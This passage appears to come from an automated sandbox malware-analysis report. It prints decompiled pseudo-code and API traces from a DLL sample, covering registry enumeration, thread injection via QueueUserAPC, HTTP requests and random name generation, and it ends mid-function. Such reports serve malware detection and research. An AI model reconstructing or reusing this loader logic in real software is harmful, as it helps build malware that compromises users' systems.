                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                            • String ID:
                                            • API String ID: 3739416942-0
                                            • Opcode ID: 9b7f30f8a240ec6bf93c852b0fbad8d4beb4c8af2cf48dd542fc88a65f27f8ed
                                            • Instruction ID: 267ec8b5b52a6e08622cd1d285d535b1bf96598b7dd94ddc538045a55a67bff3
                                            • Opcode Fuzzy Hash: 9b7f30f8a240ec6bf93c852b0fbad8d4beb4c8af2cf48dd542fc88a65f27f8ed
                                            • Instruction Fuzzy Hash: 1201AD31204200AADB306F60EE44F9B7AA9FF94325F210B34F652920F0E721F804EB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,0580A82F), ref: 05816B4B
                                            • QueueUserAPC.KERNEL32(00000000,00000000,?,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B60
                                            • GetLastError.KERNEL32(00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B6B
                                            • TerminateThread.KERNEL32(00000000,00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B75
                                            • CloseHandle.KERNEL32(00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B7C
                                            • SetLastError.KERNEL32(00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B85
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                            • String ID:
                                            • API String ID: 3832013932-0
                                            • Opcode ID: 2ad6f1adc303bec198ded9d945d61827054576a3366962c89d99ad26fbaa4d9e
                                            • Instruction ID: 2816f5028262a52c80040a64e779fff9a6da9a8bed6e6f481353b46493e39da1
                                            • Opcode Fuzzy Hash: 2ad6f1adc303bec198ded9d945d61827054576a3366962c89d99ad26fbaa4d9e
                                            • Instruction Fuzzy Hash: 7BF01232215220BFDB326BA2AC0AF5BBF69FB59761F018404FE45D2160DB25A850CBB5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 88%
                                            			E049F6E20(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                            				signed int _v8;
                                            				char _v12;
                                            				signed int* _v16;
                                            				char _v284;
                                            				void* __esi;
                                            				char* _t59;
                                            				intOrPtr* _t60;
                                            				void* _t62;
                                            				intOrPtr _t64;
                                            				char _t65;
                                            				void* _t67;
                                            				intOrPtr _t68;
                                            				intOrPtr _t69;
                                            				intOrPtr _t71;
                                            				void* _t73;
                                            				signed int _t81;
                                            				void* _t91;
                                            				void* _t92;
                                            				char _t98;
                                            				signed int* _t100;
                                            				intOrPtr* _t101;
                                            				void* _t102;
                                            
                                            				_t92 = __ecx;
                                            				_v8 = _v8 & 0x00000000;
                                            				_t98 = _a16;
                                            				if(_t98 == 0) {
                                            					__imp__( &_v284,  *0x49fa3dc);
                                            					_t91 = 0x80000002;
                                            					L6:
                                            					_t59 = E049F4208( &_v284,  &_v284);
                                            					_a8 = _t59;
                                            					if(_t59 == 0) {
                                            						_v8 = 8;
                                            						L29:
                                            						_t60 = _a20;
                                            						if(_t60 != 0) {
                                            							 *_t60 =  *_t60 + 1;
                                            						}
                                            						return _v8;
                                            					}
                                            					_t101 = _a24;
                                            					_t62 = E049F3DCA(_t92, _t97, _t101, _t91, _t59); // executed
                                            					if(_t62 != 0) {
                                            						L27:
                                            						E049F4C73(_a8);
                                            						goto L29;
                                            					}
                                            					_t64 =  *0x49fa318; // 0x4f79da0
                                            					_t16 = _t64 + 0xc; // 0x4f79ec2
                                            					_t65 = E049F4208(_t64,  *_t16);
                                            					_a24 = _t65;
                                            					if(_t65 == 0) {
                                            						L14:
                                            						_t29 = _t101 + 0x14; // 0x102
                                            						_t33 = _t101 + 0x10; // 0x3d049f90, executed
                                            						_t67 = E049F4C88(_t97,  *_t33, _t91, _a8,  *0x49fa3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
                                            						if(_t67 == 0) {
                                            							_t68 =  *0x49fa348; // 0x57d5a8
                                            							if(_t98 == 0) {
                                            								_t35 = _t68 + 0x49fba3f; // 0x4d4c4b48
                                            								_t69 = _t35;
                                            							} else {
                                            								_t34 = _t68 + 0x49fb8e7; // 0x55434b48
                                            								_t69 = _t34;
                                            							}
                                            							if(E049F26E7(_t69,  *0x49fa3d4,  *0x49fa3d8,  &_a24,  &_a16) == 0) {
                                            								if(_t98 == 0) {
                                            									_t71 =  *0x49fa348; // 0x57d5a8
                                            									_t44 = _t71 + 0x49fb846; // 0x74666f53
                                            									_t73 = E049F4208(_t44, _t44);
                                            									_t99 = _t73;
                                            									if(_t73 == 0) {
                                            										_v8 = 8;
                                            									} else {
                                            										_t47 = _t101 + 0x10; // 0x3d049f90
                                            										E049F3B76( *_t47, _t91, _a8,  *0x49fa3d8, _a24);
                                            										_t49 = _t101 + 0x10; // 0x3d049f90
                                            										E049F3B76( *_t49, _t91, _t99,  *0x49fa3d0, _a16);
                                            										E049F4C73(_t99);
                                            									}
                                            								} else {
                                            									_t40 = _t101 + 0x10; // 0x3d049f90, executed
                                            									E049F3B76( *_t40, _t91, _a8,  *0x49fa3d8, _a24); // executed
                                            									_t43 = _t101 + 0x10; // 0x3d049f90
                                            									E049F3B76( *_t43, _t91, _a8,  *0x49fa3d0, _a16);
                                            								}
                                            								if( *_t101 != 0) {
                                            									E049F4C73(_a24);
                                            								} else {
                                            									 *_t101 = _a16;
                                            								}
                                            							}
                                            						}
                                            						goto L27;
                                            					}
                                            					_t21 = _t101 + 0x10; // 0x3d049f90, executed
                                            					_t81 = E049F4E0B( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
                                            					if(_t81 == 0) {
                                            						_t100 = _v16;
                                            						if(_v12 == 0x28) {
                                            							 *_t100 =  *_t100 & _t81;
                                            							_t26 = _t101 + 0x10; // 0x3d049f90
                                            							E049F4C88(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                            						}
                                            						E049F4C73(_t100);
                                            						_t98 = _a16;
                                            					}
                                            					E049F4C73(_a24);
                                            					goto L14;
                                            				}
                                            				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                            					goto L29;
                                            				} else {
                                            					_t97 = _a8;
                                            					E049F799E(_t98, _a8,  &_v284);
                                            					__imp__(_t102 + _t98 - 0x117,  *0x49fa3dc);
                                            					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                            					_t91 = 0x80000003;
                                            					goto L6;
                                            				}
                                            			}

                                            0x049f700e
                                            0x049f701a
                                            0x049f7010
                                            0x049f7013
                                            0x049f7013
                                            0x049f700e
                                            0x049f6f87
                                            0x00000000
                                            0x049f6f4e
                                            0x049f6ef7
                                            0x049f6efa
                                            0x049f6f01
                                            0x049f6f07
                                            0x049f6f0a
                                            0x049f6f0c
                                            0x049f6f18
                                            0x049f6f1b
                                            0x049f6f1b
                                            0x049f6f21
                                            0x049f6f26
                                            0x049f6f26
                                            0x049f6f2c
                                            0x00000000
                                            0x049f6f2c
                                            0x049f6e3a
                                            0x00000000
                                            0x049f6e61
                                            0x049f6e61
                                            0x049f6e6d
                                            0x049f6e80
                                            0x049f6e86
                                            0x049f6e8e
                                            0x00000000
                                            0x049f6e8e

                                            APIs
                                            • StrChrA.SHLWAPI(049F2A82,0000005F,00000000,00000000,00000104), ref: 049F6E53
                                            • lstrcpy.KERNEL32(?,?), ref: 049F6E80
                                              • Part of subcall function 049F4208: lstrlen.KERNEL32(?,00000000,04F79DA0,00000000,049F2263,04F79FC3,69B25F44,?,?,?,?,69B25F44,00000005,049FA00C,4D283A53,?), ref: 049F420F
                                              • Part of subcall function 049F4208: mbstowcs.NTDLL ref: 049F4238
                                              • Part of subcall function 049F4208: memset.NTDLL ref: 049F424A
                                              • Part of subcall function 049F3B76: lstrlenW.KERNEL32(?,?,?,049F6FE9,3D049F90,80000002,049F2A82,049F744C,74666F53,4D4C4B48,049F744C,?,3D049F90,80000002,049F2A82,?), ref: 049F3B9B
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            • lstrcpy.KERNEL32(?,00000000), ref: 049F6EA2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                            • String ID: ($\
                                            • API String ID: 3924217599-1512714803
                                            • Opcode ID: 7648a708df4d4901a4d6ebc61b56bc85fee22ed0ebec6bf41e45d479a240e3dd
                                            • Instruction ID: dc3d6ca09d74a652eb7b726826ef7abd946eb0fd23b5123092e5bae4ffbd90d8
                                            • Opcode Fuzzy Hash: 7648a708df4d4901a4d6ebc61b56bc85fee22ed0ebec6bf41e45d479a240e3dd
                                            • Instruction Fuzzy Hash: 62514972510209EFDF21AFA0DC40EAA7BBAEF44354F048574FA1596120E776F925EB10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • memset.NTDLL ref: 0580EADA
                                            • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0580EB64
                                            • WaitForSingleObject.KERNEL32(00000064), ref: 0580EB72
                                            • SuspendThread.KERNEL32(?), ref: 0580EB85
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                                            • String ID: v
                                            • API String ID: 3168247402-1801730948
                                            • Opcode ID: 2c28030b28e18f22e321b73cca88dcdacfe461fdacbc1211be553e1215b2bb4c
                                            • Instruction ID: 0e8d1d843a0dbc41b7ca53f8292a1e53a68562137cdbed0f43e76b20599d7133
                                            • Opcode Fuzzy Hash: 2c28030b28e18f22e321b73cca88dcdacfe461fdacbc1211be553e1215b2bb4c
                                            • Instruction Fuzzy Hash: 24412871108301AFE761EF54CC85D6BBBE9FB88310F004D29FA95D21A0D732E9558B62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E049F737F(void* __ecx, intOrPtr _a4) {
                                            				int* _v8;
                                            				int _v12;
                                            				int* _v16;
                                            				int _v20;
                                            				int* _v24;
                                            				char* _v28;
                                            				void* _v32;
                                            				long _t33;
                                            				char* _t35;
                                            				long _t39;
                                            				long _t42;
                                            				intOrPtr _t47;
                                            				void* _t51;
                                            				long _t53;
                                            
                                            				_t51 = __ecx;
                                            				_v8 = 0;
                                            				_v16 = 0;
                                            				_v12 = 0;
                                            				_v24 = 0;
                                            				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
                                            				_t53 = _t33;
                                            				if(_t53 != 0) {
                                            					L18:
                                            					return _t53;
                                            				}
                                            				_t53 = 8;
                                            				_t35 = E049F4DF6(0x104);
                                            				_v28 = _t35;
                                            				if(_t35 == 0) {
                                            					L17:
                                            					RegCloseKey(_v32); // executed
                                            					goto L18;
                                            				}
                                            				_v20 = 0x104;
                                            				do {
                                            					_v16 = _v20;
                                            					_v12 = 0x104;
                                            					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
                                            					_t53 = _t39;
                                            					if(_t53 != 0xea) {
                                            						if(_t53 != 0) {
                                            							L14:
                                            							if(_t53 == 0x103) {
                                            								_t53 = 0;
                                            							}
                                            							L16:
                                            							E049F4C73(_v28);
                                            							goto L17;
                                            						}
                                            						_t42 = E049F6E20(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
                                            						_t53 = _t42;
                                            						if(_t53 != 0) {
                                            							goto L14;
                                            						}
                                            						goto L12;
                                            					}
                                            					if(_v12 <= 0x104) {
                                            						if(_v16 <= _v20) {
                                            							goto L16;
                                            						}
                                            						E049F4C73(_v24);
                                            						_v20 = _v16;
                                            						_t47 = E049F4DF6(_v16);
                                            						_v24 = _t47;
                                            						if(_t47 != 0) {
                                            							L6:
                                            							_t53 = 0;
                                            							goto L12;
                                            						}
                                            						_t53 = 8;
                                            						goto L16;
                                            					}
                                            					_v8 = _v8 + 1;
                                            					goto L6;
                                            					L12:
                                            				} while (WaitForSingleObject( *0x49fa30c, 0) == 0x102);
                                            				goto L16;
                                            			}
                                            0x049f737f
                                            0x049f7399
                                            0x049f739c
                                            0x049f739f
                                            0x049f73a2
                                            0x049f73a5
                                            0x049f73ab
                                            0x049f73af
                                            0x049f7489
                                            0x049f748d
                                            0x049f748d
                                            0x049f73b8
                                            0x049f73bf
                                            0x049f73c4
                                            0x049f73c9
                                            0x049f747e
                                            0x049f7481
                                            0x00000000
                                            0x049f7487
                                            0x049f73cf
                                            0x049f73d2
                                            0x049f73d9
                                            0x049f73e3
                                            0x049f73ec
                                            0x049f73f2
                                            0x049f73fa
                                            0x049f7432
                                            0x049f746c
                                            0x049f7472
                                            0x049f7474
                                            0x049f7474
                                            0x049f7476
                                            0x049f7479
                                            0x00000000
                                            0x049f7479
                                            0x049f7447
                                            0x049f744c
                                            0x049f7450
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f7450
                                            0x049f73ff
                                            0x049f740e
                                            0x00000000
                                            0x00000000
                                            0x049f7413
                                            0x049f741c
                                            0x049f741f
                                            0x049f7424
                                            0x049f7429
                                            0x049f7404
                                            0x049f7404
                                            0x00000000
                                            0x049f7404
                                            0x049f742d
                                            0x00000000
                                            0x049f742d
                                            0x049f7401
                                            0x00000000
                                            0x049f7452
                                            0x049f745f
                                            0x00000000

                                            APIs
                                            • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,049F2A82,?), ref: 049F73A5
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • RegEnumKeyExA.KERNEL32(?,?,?,049F2A82,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,049F2A82), ref: 049F73EC
                                            • WaitForSingleObject.KERNEL32(00000000,?,?,?,049F2A82,?,049F2A82,?,?,?,?,?,049F2A82,?), ref: 049F7459
                                            • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,049F2A82,?), ref: 049F7481
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                            • String ID: !s
                                            • API String ID: 3664505660-1801701826
                                            • Opcode ID: 0c03a2d55e335fdd9ac0d19f627ae61e5f8c8c11130693f31ab2d3323a609c0f
                                            • Instruction ID: b692a648ecbf863cc410f514b898a1e59bef33289e96039f18a8ead64f0cc7c7
                                            • Opcode Fuzzy Hash: 0c03a2d55e335fdd9ac0d19f627ae61e5f8c8c11130693f31ab2d3323a609c0f
                                            • Instruction Fuzzy Hash: 5E314B71D00119BBDF21AFE9DC449EFFFBAEB84314F104176EA61B2150D2742A51DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 57%
                                            			E049F2C52(signed int __edx) {
                                            				signed int _v8;
                                            				long _v12;
                                            				CHAR* _v16;
                                            				long _v20;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* _t21;
                                            				CHAR* _t22;
                                            				CHAR* _t25;
                                            				intOrPtr _t26;
                                            				void* _t27;
                                            				void* _t31;
                                            				void* _t32;
                                            				CHAR* _t36;
                                            				CHAR* _t42;
                                            				CHAR* _t43;
                                            				CHAR* _t44;
                                            				void* _t49;
                                            				void* _t51;
                                            				signed char _t56;
                                            				intOrPtr _t58;
                                            				signed int _t59;
                                            				void* _t63;
                                            				CHAR* _t67;
                                            				CHAR* _t68;
                                            				char* _t69;
                                            				void* _t70;
                                            
                                            				_t61 = __edx;
                                            				_v20 = 0;
                                            				_v8 = 0;
                                            				_v12 = 0;
                                            				_t21 = E049F175D();
                                            				if(_t21 != 0) {
                                            					_t59 =  *0x49fa2fc; // 0x4000000a
                                            					_t55 = (_t59 & 0xf0000000) + _t21;
                                            					 *0x49fa2fc = (_t59 & 0xf0000000) + _t21;
                                            				}
                                            				_t22 =  *0x49fa178(0, 2); // executed
                                            				_v16 = _t22;
                                            				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                            					_t25 = E049F5765( &_v8,  &_v20); // executed
                                            					_t54 = _t25;
                                            					_t26 =  *0x49fa348; // 0x57d5a8
                                            					if( *0x49fa2fc > 5) {
                                            						_t8 = _t26 + 0x49fb5cd; // 0x4d283a53
                                            						_t27 = _t8;
                                            					} else {
                                            						_t7 = _t26 + 0x49fb9f5; // 0x44283a44
                                            						_t27 = _t7;
                                            					}
                                            					E049F3EF8(_t27, _t27);
                                            					_t31 = E049F5410(_t61,  &_v20,  &_v12); // executed
                                            					if(_t31 == 0) {
                                            						CloseHandle(_v20);
                                            					}
                                            					_t63 = 5;
                                            					if(_t54 != _t63) {
                                            						 *0x49fa310 =  *0x49fa310 ^ 0x81bbe65d;
                                            						_t32 = E049F4DF6(0x60);
                                            						 *0x49fa3cc = _t32;
                                            						__eflags = _t32;
                                            						if(_t32 == 0) {
                                            							_push(8);
                                            							_pop(0);
                                            						} else {
                                            							memset(_t32, 0, 0x60);
                                            							_t49 =  *0x49fa3cc; // 0x4f795b0
                                            							_t70 = _t70 + 0xc;
                                            							__imp__(_t49 + 0x40);
                                            							_t51 =  *0x49fa3cc; // 0x4f795b0
                                            							 *_t51 = 0x49fb81a;
                                            						}
                                            						_t54 = 0;
                                            						__eflags = 0;
                                            						if(0 == 0) {
                                            							_t36 = RtlAllocateHeap( *0x49fa2d8, 0, 0x43);
                                            							 *0x49fa368 = _t36;
                                            							__eflags = _t36;
                                            							if(_t36 == 0) {
                                            								_push(8);
                                            								_pop(0);
                                            							} else {
                                            								_t56 =  *0x49fa2fc; // 0x4000000a
                                            								_t61 = _t56 & 0x000000ff;
                                            								_t58 =  *0x49fa348; // 0x57d5a8
                                            								_t13 = _t58 + 0x49fb55a; // 0x697a6f4d
                                            								_t55 = _t13;
                                            								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x49f9287);
                                            							}
                                            							_t54 = 0;
                                            							__eflags = 0;
                                            							if(0 == 0) {
                                            								asm("sbb eax, eax");
                                            								E049F12D3( ~_v8 &  *0x49fa310, 0x49fa00c); // executed
                                            								_t42 = E049F475F(0, _t55, _t63, 0x49fa00c); // executed
                                            								_t54 = _t42;
                                            								__eflags = _t54;
                                            								if(_t54 != 0) {
                                            									goto L30;
                                            								}
                                            								_t43 = E049F21FC(); // executed
                                            								__eflags = _t43;
                                            								if(_t43 != 0) {
                                            									__eflags = _v8;
                                            									_t67 = _v12;
                                            									if(_v8 != 0) {
                                            										L29:
                                            										_t44 = E049F6B13(_t61, _t67, _v8); // executed
                                            										_t54 = _t44;
                                            										goto L30;
                                            									}
                                            									__eflags = _t67;
                                            									if(__eflags == 0) {
                                            										goto L30;
                                            									}
                                            									_t54 = E049F4ECB(__eflags,  &(_t67[4]));
                                            									__eflags = _t54;
                                            									if(_t54 == 0) {
                                            										goto L30;
                                            									}
                                            									goto L29;
                                            								}
                                            								_t54 = 8;
                                            							}
                                            						}
                                            					} else {
                                            						_t68 = _v12;
                                            						if(_t68 == 0) {
                                            							L30:
                                            							if(_v16 == 0 || _v16 == 1) {
                                            								 *0x49fa17c(); // executed
                                            							}
                                            							goto L34;
                                            						}
                                            						_t69 =  &(_t68[4]);
                                            						do {
                                            						} while (E049F3E6C(_t63, _t69, 0, 1) == 0x4c7);
                                            					}
                                            					goto L30;
                                            				} else {
                                            					_t54 = _t22;
                                            					L34:
                                            					return _t54;
                                            				}
                                            			}
                                            0x049f2c52
                                            0x049f2c5c
                                            0x049f2c5f
                                            0x049f2c62
                                            0x049f2c65
                                            0x049f2c6c
                                            0x049f2c6e
                                            0x049f2c7a
                                            0x049f2c7c
                                            0x049f2c7c
                                            0x049f2c85
                                            0x049f2c8b
                                            0x049f2c90
                                            0x049f2caa
                                            0x049f2cb6
                                            0x049f2cb8
                                            0x049f2cbd
                                            0x049f2cc7
                                            0x049f2cc7
                                            0x049f2cbf
                                            0x049f2cbf
                                            0x049f2cbf
                                            0x049f2cbf
                                            0x049f2cce
                                            0x049f2cdb
                                            0x049f2ce2
                                            0x049f2ce7
                                            0x049f2ce7
                                            0x049f2cf0
                                            0x049f2cf3
                                            0x049f2d19
                                            0x049f2d25
                                            0x049f2d2a
                                            0x049f2d2f
                                            0x049f2d31
                                            0x049f2d5d
                                            0x049f2d5f
                                            0x049f2d33
                                            0x049f2d37
                                            0x049f2d3c
                                            0x049f2d41
                                            0x049f2d48
                                            0x049f2d4e
                                            0x049f2d53
                                            0x049f2d59
                                            0x049f2d60
                                            0x049f2d62
                                            0x049f2d64
                                            0x049f2d73
                                            0x049f2d79
                                            0x049f2d7e
                                            0x049f2d80
                                            0x049f2db0
                                            0x049f2db2
                                            0x049f2d82
                                            0x049f2d82
                                            0x049f2d88
                                            0x049f2d95
                                            0x049f2d9b
                                            0x049f2d9b
                                            0x049f2da3
                                            0x049f2dac
                                            0x049f2db3
                                            0x049f2db5
                                            0x049f2db7
                                            0x049f2dbe
                                            0x049f2dcb
                                            0x049f2dd0
                                            0x049f2dd5
                                            0x049f2dd7
                                            0x049f2dd9
                                            0x00000000
                                            0x00000000
                                            0x049f2ddb
                                            0x049f2de0
                                            0x049f2de2
                                            0x049f2de9
                                            0x049f2ded
                                            0x049f2df0
                                            0x049f2e05
                                            0x049f2e09
                                            0x049f2e0e
                                            0x00000000
                                            0x049f2e0e
                                            0x049f2df2
                                            0x049f2df4
                                            0x00000000
                                            0x00000000
                                            0x049f2dff
                                            0x049f2e01
                                            0x049f2e03
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f2e03
                                            0x049f2de6
                                            0x049f2de6
                                            0x049f2db7
                                            0x049f2cf5
                                            0x049f2cf5
                                            0x049f2cfa
                                            0x049f2e10
                                            0x049f2e15
                                            0x049f2e1d
                                            0x049f2e1d
                                            0x00000000
                                            0x049f2e15
                                            0x049f2d00
                                            0x049f2d03
                                            0x049f2d0d
                                            0x049f2d14
                                            0x00000000
                                            0x049f2e25
                                            0x049f2e25
                                            0x049f2e28
                                            0x049f2e2c
                                            0x049f2e2c

                                            APIs
                                              • Part of subcall function 049F175D: GetModuleHandleA.KERNEL32(4C44544E,00000000,049F2C6A,00000001), ref: 049F176C
                                            • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 049F2CE7
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • memset.NTDLL ref: 049F2D37
                                            • RtlInitializeCriticalSection.NTDLL(04F79570), ref: 049F2D48
                                              • Part of subcall function 049F4ECB: memset.NTDLL ref: 049F4EE5
                                              • Part of subcall function 049F4ECB: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 049F4F2B
                                              • Part of subcall function 049F4ECB: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 049F4F36
                                            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 049F2D73
                                            • wsprintfA.USER32 ref: 049F2DA3
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                            • String ID:
                                            • API String ID: 4246211962-0
                                            • Opcode ID: 41c53b6ec6df57ec74f62361c85ccbb6c47255691b9c4ce19b5e78b207bd8b53
                                            • Instruction ID: 046e563aabbdb036584e1f9e44d4a6da0212d1011864c2c6a055b36d033be1a4
                                            • Opcode Fuzzy Hash: 41c53b6ec6df57ec74f62361c85ccbb6c47255691b9c4ce19b5e78b207bd8b53
                                            • Instruction Fuzzy Hash: 5651E771B04215ABEB219FE4DC48FAE7BACEB44714F1448B5EB05D7180E7BAB9508B50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 22%
                                            			E049F70AE(signed int __eax, signed int _a4, signed int _a8) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				signed int _v20;
                                            				intOrPtr _t81;
                                            				char _t83;
                                            				signed int _t90;
                                            				signed int _t97;
                                            				signed int _t99;
                                            				char _t101;
                                            				unsigned int _t102;
                                            				intOrPtr _t103;
                                            				char* _t107;
                                            				signed int _t110;
                                            				signed int _t113;
                                            				signed int _t118;
                                            				signed int _t122;
                                            				intOrPtr _t124;
                                            
                                            				_t102 = _a8;
                                            				_t118 = 0;
                                            				_v20 = __eax;
                                            				_t122 = (_t102 >> 2) + 1;
                                            				_v8 = 0;
                                            				_a8 = 0;
                                            				_t81 = E049F4DF6(_t122 << 2);
                                            				_v16 = _t81;
                                            				if(_t81 == 0) {
                                            					_push(8); // push 8 / pop eax: returns error code 8 (ERROR_NOT_ENOUGH_MEMORY) when the pointer table cannot be allocated
                                            					_pop(0);
                                            					L37:
                                            					return 0;
                                            				}
                                            				_t107 = _a4;
                                            				_a4 = _t102;
                                            				_t113 = 0;
                                            				while(1) {
                                            					_t83 =  *_t107;
                                            					if(_t83 == 0) {
                                            						break;
                                            					}
                                            					if(_t83 == 0xd || _t83 == 0xa) { // CR or LF terminates the current word
                                            						if(_t118 != 0) {
                                            							if(_t118 > _v8) {
                                            								_v8 = _t118;
                                            							}
                                            							_a8 = _a8 + 1;
                                            							_t118 = 0;
                                            						}
                                            						 *_t107 = 0;
                                            						goto L16;
                                            					} else {
                                            						if(_t118 != 0) {
                                            							L10:
                                            							_t118 = _t118 + 1;
                                            							L16:
                                            							_t107 = _t107 + 1;
                                            							_t15 =  &_a4;
                                            							 *_t15 = _a4 - 1;
                                            							if( *_t15 != 0) {
                                            								continue;
                                            							}
                                            							break;
                                            						}
                                            						if(_t113 == _t122) {
                                            							L21:
                                            							if(_a8 <= 0x20) { // fewer than 0x21 words parsed: fail with error code 0xb (ERROR_BAD_FORMAT)
                                            								_push(0xb);
                                            								L34:
                                            								_pop(0);
                                            								L35:
                                            								E049F4C73(_v16);
                                            								goto L37;
                                            							}
                                            							_t24 = _v8 + 5; // 0xcdd8d2f8
                                            							_t103 = E049F4DF6((_v8 + _t24) * _a8 + 4);
                                            							if(_t103 == 0) {
                                            								_push(8);
                                            								goto L34;
                                            							}
                                            							_t90 = _a8;
                                            							_a4 = _a4 & 0x00000000;
                                            							_v8 = _v8 & 0x00000000;
                                            							_t124 = _t103 + _t90 * 4;
                                            							if(_t90 <= 0) {
                                            								L31:
                                            								 *0x49fa318 = _t103; // the finished name table is kept in this global for later callers
                                            								goto L35;
                                            							}
                                            							do {
                                            								_t110 = 0x3c6ef35f + _v20 * 0x19660d; // 32-bit LCG step (multiplier 0x19660d, increment 0x3c6ef35f); __eax is the seed
                                            								_v20 = 0x3c6ef35f + _t110 * 0x19660d; // second LCG step: two random word indices per generated name
                                            								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4))); // lstrcpy (ref 049F71AB): first word
                                            								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4))); // lstrcat (ref 049F71C0): append second word
                                            								_v12 = _v12 & 0x00000000;
                                            								if(_a4 <= 0) {
                                            									goto L30;
                                            								} else {
                                            									goto L26;
